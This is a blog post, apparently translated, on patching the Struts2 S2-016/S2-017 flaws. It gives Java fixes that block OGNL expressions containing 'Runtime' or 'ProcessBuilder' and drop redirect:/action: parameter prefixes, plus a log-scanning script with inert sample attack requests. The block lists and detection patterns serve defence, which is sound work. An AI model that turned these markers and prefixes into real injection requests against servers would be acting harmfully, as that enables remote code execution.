Yesterday a major Struts2 vulnerability was disclosed. In the words of Brother Tao, "this afternoon, hackers in China started exploiting this vulnerability like crazy. You can feel it."
Look at the WooYun data from the past two days:
Related reports:
Disaster Day: the Chinese Internet has suffered a high-risk Struts2 Vulnerability
Critical Struts2 vulnerabilities disclosed, affecting all versions
Official description:
S2-016: https://cwiki.apache.org/confluence/display/WW/S2-016
S2-017: https://cwiki.apache.org/confluence/display/WW/S2-017
====================================
Fix for Struts2 vulnerabilities S2-016 and S2-017:
The code is placed at the end to keep the layout tidy.
Solution 1:
Solution introduction:
Manually modify the source of ognl.jar to add filtering of malicious expressions. This method only fixes S2-016, but it may also block future OGNL vulnerabilities.
Procedure:
1.1 Locate ognl-version.jar in the project and obtain its source code. Unpack the source, import it into Eclipse, open Ognl.java and modify the code shown below (see the attachment).
1.2 Export the modified project from Eclipse as ognl-my.jar and put it in the lib directory.
1.3 Delete the original ognl-version.jar.
1.4 Restart the server.
Solution 2:
Solution introduction:
Override the handleSpecialParameters method of the Struts2 DefaultActionMapper to filter parameters carrying the action:, redirect: and redirectAction: prefixes. This method fixes both S2-016 and S2-017.
Procedure:
2.1 Create com/website/struts2/MyDefaultActionMapper.java with the code shown below (see the attachment).
2.2 Copy the compiled MyDefaultActionMapper.class into the /com/website/struts2/ directory.
2.3 Add the following configuration to struts.xml (see the attachment).
2.4 Restart the server.
Note:
1. The "malicious code" keyword list in solution 1 and the "action, redirect, redirectAction" prefix list in solution 2 are both hardcoded. If needed, read them from a configuration file instead.
2. Solution 1 should in principle have no impact on the system. Solution 2 has been tested with redirect and redirectAction jumps, but not across the whole site.
3. Solutions 1 and 2 can be applied together, or either one alone.
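As an added example (not part of the original post), the following Python script applies the two rules above to web-server access logs on the defender's side: it flags the redirect:/redirectAction:/action: prefixes that solution 2 refuses and the Runtime/ProcessBuilder keywords that solution 1 rejects, after decoding the query string. The log lines and the list of OGNL expression markers are constructed for the demo.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameter prefixes that DefaultActionMapper.handleSpecialParameters acts on;
# solution 2 on this page refuses these keys outright.
SPECIAL_PREFIXES = ("redirect:", "redirectAction:", "action:")
# The two keywords visible in solution 1's hardcoded list, lowercased for comparison.
OGNL_KEYWORDS = ("runtime", "processbuilder")
# Delimiters that open an OGNL expression in a Struts2 parameter (assumed list).
OGNL_MARKERS = ("${", "%{")

# Common Log Format; only the fields needed below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

def classify_params(url):
    """Return the distinct reasons a request URL matches, in first-seen order."""
    reasons = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        # parse_qsl decodes once; decoding again also exposes double-encoded payloads
        name, value = unquote(name), unquote(value)
        if name.startswith(SPECIAL_PREFIXES):
            reasons.append("special-prefix:" + name.split(":", 1)[0])
        if any(m in name or m in value for m in OGNL_MARKERS):
            reasons.append("ognl-marker")
        for kw in OGNL_KEYWORDS:
            if kw in (name + value).lower():
                reasons.append("ognl-keyword:" + kw)
    return list(dict.fromkeys(reasons))  # de-duplicate, keep order

def scan_log(lines):
    """Yield (ip, url, reasons) for every access-log line that trips a rule."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not CLF; skip rather than guess
        reasons = classify_params(m.group("url"))
        if reasons:
            yield m.group("ip"), m.group("url"), reasons

# Constructed sample lines; the OGNL bodies are inert and only carry the markers.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Jul/2013:14:02:11 +0800] "GET /index.action?page=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [17/Jul/2013:14:02:13 +0800] "GET /index.action?redirect:%24%7B%23a%3D1%7D HTTP/1.1" 302 0',
    '10.0.0.9 - - [17/Jul/2013:14:02:14 +0800] "GET /index.action?redirectAction:%25%7BProcessBuilder%7D HTTP/1.1" 500 0',
    '10.0.0.7 - - [17/Jul/2013:14:02:15 +0800] "GET /view.action?action:list HTTP/1.1" 200 88',
]
```

Run `list(scan_log(SAMPLE_LOG))` to see the three flagged lines. The action: prefix is also emitted by legitimate Struts2 submit buttons, so hits on it alone need a look at the value before being treated as an attack.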
Attachment:
Ognl.java
(The listing below is reconstructed from the garbled attachment: the keyword check is the author's addition, inserted into Ognl.parseExpression before the expression string, here called methodString, is handed to OgnlParser; the surrounding method body follows the stock OGNL source.)

    public static Object parseExpression(String methodString) throws OgnlException {
        // Hardcoded list of keywords that indicate command execution (see note 1)
        String evalMethod[] = {"Runtime", "ProcessBuilder"};
        for (int i = 0; i < evalMethod.length; i++) {
            // Compare both sides in lower case so that capitalisation in the payload cannot bypass the check
            if (methodString.toLowerCase().indexOf(evalMethod[i].toLowerCase()) > -1) {
                // Exception type assumed; the original message text is kept
                throw new OgnlException("| OGNL is executing a malicious statement |" + methodString
                        + "| contact the security engineer to view the message !!! ");
            }
        }
        try {
            OgnlParser parser = new OgnlParser(new StringReader(methodString));
            return parser.topLevelExpression();
        } catch (ParseException e) {
            throw new ExpressionSyntaxException(methodString, e);
        } catch (TokenMgrError e) {
            throw new ExpressionSyntaxException(methodString, e);
        }
    }
MyDefaultActionMapper.java
(Reconstructed from the garbled attachment: the three key.contains(...) checks are the author's addition; the rest follows the stock DefaultActionMapper.handleSpecialParameters.)

    package com.website.struts2;

    import java.util.HashSet;
    import java.util.Iterator;
    import java.util.Map;
    import java.util.Set;
    import javax.servlet.http.HttpServletRequest;
    import org.apache.struts2.dispatcher.mapper.ActionMapping;
    import org.apache.struts2.dispatcher.mapper.DefaultActionMapper;

    public class MyDefaultActionMapper extends DefaultActionMapper {

        @Override
        public void handleSpecialParameters(HttpServletRequest request, ActionMapping mapping) {
            Set<String> uniqueParameters = new HashSet<String>();
            Map parameterMap = request.getParameterMap();
            for (Iterator iterator = parameterMap.keySet().iterator(); iterator.hasNext();) {
                String key = (String) iterator.next();
                // Image-button submits arrive as name.x / name.y; strip the suffix
                if ((key.endsWith(".x")) || (key.endsWith(".y"))) {
                    key = key.substring(0, key.length() - 2);
                }
                // Added filter: never honour the redirect:, redirectAction: or action: prefixes (S2-016 / S2-017)
                if ((key.contains("redirect:")) || (key.contains("redirectAction:")) || (key.contains("action:"))) {
                    continue;
                }
                if (!uniqueParameters.contains(key)) {
                    ParameterAction parameterAction = (ParameterAction) prefixTrie.get(key);
                    if (parameterAction != null) {
                        parameterAction.execute(key, mapping);
                        uniqueParameters.add(key);
                        break;
                    }
                }
            }
        }
    }
struts.xml
Several test payloads were also attached (that code is taken from the Internet; no liability is accepted for the consequences of using it).
Reference URL for the code in this article: http://www.inbreak.net/archives/507